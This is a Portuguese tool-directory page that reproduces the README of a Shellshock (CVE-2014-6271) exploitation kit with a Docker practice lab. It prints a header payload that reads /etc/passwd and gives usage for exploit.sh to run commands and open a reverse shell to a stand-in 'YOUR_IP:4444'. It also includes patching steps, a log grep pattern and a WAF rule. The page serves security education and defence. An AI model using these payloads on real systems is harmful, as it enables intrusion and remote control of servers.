Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
bash-apocalypse — Recriando Shellshock (CVE-2014-6271) - a vulnerabilidade bash que colocou em risco milhões de servidores. Kit de exploração automatizada + metodologia Burp Suite + laboratório Docker. Construído para pesquisa e educação em segurança. Projeto de portfólio de segurança ofensiva. | Kitploit
Ferramentas/GitHubGitHub/mtaha-sec/bash-apocalypse
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoEvasão de IDS/IPSShellcodeExploração de Aplicações WebTestes de PenetraçãoComando e ControleConfiguração IncorretaAprendizado e EducaçãoLabs e Prática
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
mtaha-sec/bash-apocalypse

bash-apocalypse

Recriando Shellshock (CVE-2014-6271) - a vulnerabilidade bash que colocou em risco milhões de servidores. Kit de exploração automatizada + metodologia Burp Suite + laboratório Docker. Construído para pesquisa e educação em segurança. Projeto de portfólio de segurança ofensiva.

Ver Repositório

Bash Apocalipse

Kit de exploração automatizada para CVE-2014-6271 (Shellshock)

Severity CVSS Score

Um projeto completo de pesquisa em segurança demonstrando a vulnerabilidade Shellshock que afetou milhões de servidores em 2014. Inclui varredura automatizada, capacidades de exploração e recomendações defensivas.

Demo


O que é Shellshock?

Shellshock (CVE-2014-6271) é uma vulnerabilidade crítica no shell Bash que permite execução remota de código através da manipulação de variáveis de ambiente. Descoberta em 2014 após existir por 22 anos, afetou milhões de sistemas Unix/Linux em todo o mundo.

Como funciona:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

Servidores web que usam CGI passam cabeçalhos HTTP como variáveis de ambiente para o Bash, tornando-os vulneráveis:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Início Rápido

root@kitploit:~
# Clone and setup
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Start vulnerable lab
docker-compose up -d

# Run exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

Funcionalidades

Scanner Automatizado

  • Descobre endpoints CGI vulneráveis
  • Testa múltiplos pontos de injeção (User-Agent, Referer, Cookie)
  • Suporte a wordlist personalizada

Ferramenta de Exploração

  • Execução de comandos com captura de saída
  • Reverse shell automatizado
  • Múltiplas opções de payload

Ambiente de Laboratório

  • Configuração Docker com um comando
  • Servidor vulnerável isolado
  • Ambiente de teste seguro

Uso

Escanear por vulnerabilidades

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

Executar comandos

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

Obter reverse shell

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

Exploração Manual (Burp Suite)

Passo 1: Interceptar Requisição

Burp Intercept

Passo 2: Injetar Payload

Exploitation

Modifique o cabeçalho User-Agent:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Passo 3: Observar a Resposta

Reverse Shell

O servidor executa seu comando e retorna a saída.


Análise Técnica

Fluxo de Ataque

root@kitploit:~
Client (Attacker)
    │
    │ HTTP Request with malicious User-Agent
    ▼
Web Server
    │
    │ Passes header as environment variable
    ▼
CGI Script
    │
    │ Spawns Bash process
    ▼
Bash Shell
    │
    │ Parses function + executes trailing commands
    ▼
Command Execution (RCE)

Causa Raiz

Quando o Bash encontra uma definição de função em uma variável de ambiente:

  1. Ele analisa a função: () { :;}
  2. Bug: Ele continua analisando e executa qualquer coisa depois
  3. Resultado: Execução arbitrária de comandos

Defesa

Mitigação Imediata

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

Detecção

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

Regra WAF

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

Habilidades Demonstradas

  • Teste de penetração em aplicações web
  • Scripting e automação em Bash
  • Manipulação do protocolo HTTP
  • Contêinerização Docker
  • Proficiência em Burp Suite
  • Segurança tanto ofensiva quanto defensiva

Estrutura do Projeto

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Main tool
├── payloads.txt            # Test payloads
├── docker-compose.yml      # Lab setup
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

Aviso Legal

Apenas para fins educacionais. Teste apenas sistemas que você possui ou tem permissão explícita para testar. Acesso não autorizado é ilegal.


Recursos

  • CVE-2014-6271 Details
  • Cloudflare: Inside Shellshock
  • Practice: HackTheBox - Shocker

Construído para entender como as vulnerabilidades funcionam e como se defender delas. ;)

Baixar ferramenta